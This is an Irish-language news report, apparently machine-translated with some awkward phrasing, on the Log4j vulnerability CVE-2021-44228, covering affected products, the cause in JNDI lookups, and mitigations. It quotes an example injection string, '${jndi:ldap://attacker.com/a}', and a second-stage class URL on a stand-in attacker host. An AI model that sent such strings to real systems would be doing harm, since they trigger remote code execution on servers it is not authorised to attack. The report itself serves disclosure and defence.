In Apache Log4j, creat coitianta chun logáil a eagrú i bhfeidhmchláir Java, sainaithníodh leochaileacht ríthábhachtach a cheadaíonn cód treallach a fhorghníomhú nuair a scríobhtar luach sainfhormáidithe san fhormáid “{jndi:URL}” chuig an loga. Is féidir an t-ionsaí a dhéanamh ar iarratais Java a logálann luachanna a fhaightear ó fhoinsí seachtracha, mar shampla, nuair a thaispeánann siad luachanna fadhbacha i dteachtaireachtaí earráide.
Tugtar faoi deara go bhfuil tionchar ag an bhfadhb ar beagnach gach tionscadal a úsáideann creataí cosúil le Apache Struts, Apache Solr, Apache Druid nó Apache Flink, lena n-áirítear Steam, Apple iCloud, cliaint agus freastalaithe Minecraft. Táthar ag súil go bhféadfadh tonn d'ionsaithe ollmhóra ar iarratais chorparáideacha a bheith mar thoradh ar an leochaileacht, ag athrá stair na leochaileachtaí ríthábhachtacha i gcreat Apache Struts, a úsáidtear, de réir meastachán garbh, in iarratais gréasáin faoi 65% de Fortune. 100 cuideachta lena n-áirítear iarrachtaí chun an líonra a scanadh le haghaidh córais leochaileacha.
Tá an fhadhb níos measa ag an bhfíric go bhfuil shaothrú oibre foilsithe cheana féin, ach nach bhfuil réitigh do na brainsí cobhsaí curtha le chéile go fóill. Níl an t-aitheantóir CVE sannta go fóill. Níl an socrú san áireamh ach amháin sa bhrainse tástála log4j-2.15.0-rc1. Mar réiteach chun an leochaileacht a bhlocáil, moltar an paraiméadar log4j2.formatMsgNoLookups a shocrú go fíor.
Ba é an chúis leis an bhfadhb ná tacaíocht log4j do phróiseáil maisc speisialta "{}" i línte loga, ar féidir iad a úsáid chun fiosrúcháin JNDI (Java Naming and Directory Interface) a dhéanamh. Is é an rud is tábhachtaí san ionsaí ná teaghrán a rith leis an ionadú "${jndi:ldap://attacker.com/a}", a sheolfaidh log4j nuair a bheidh sé próiseáilte freastalaí Iarratas LDAP attacker.com le haghaidh cosán ranga Java. Ar ais freastalaí Luchtófar agus cuirfear i gcrích cosán an ionsaitheora (e.g. http://second-stage.attacker.com/Exploit.class) i gcomhthéacs an phróisis reatha, rud a ligfidh don ionsaitheoir cód treallach a fhorghníomhú ar an gcóras le pribhléidí an fheidhmchláir reatha.
Aguisín 1: Tá an t-aitheantóir CVE-2021-44228 sannta don leochaileacht.
Aguisín 2: Aithníodh bealach chun an chosaint a chuirtear leis trí scaoileadh log4j-2.15.0-rc1 a sheachbhóthar. Tá nuashonrú nua, log4j-2.15.0-rc2, molta le cosaint níos iomláine ar an leochaileacht. Leagann an cód béim ar an athrú a bhaineann le heaspa foirceannadh neamhghnácha i gcás URL JNDI atá formáidithe go mícheart a úsáid.
Foinse: oscailtenet.ru
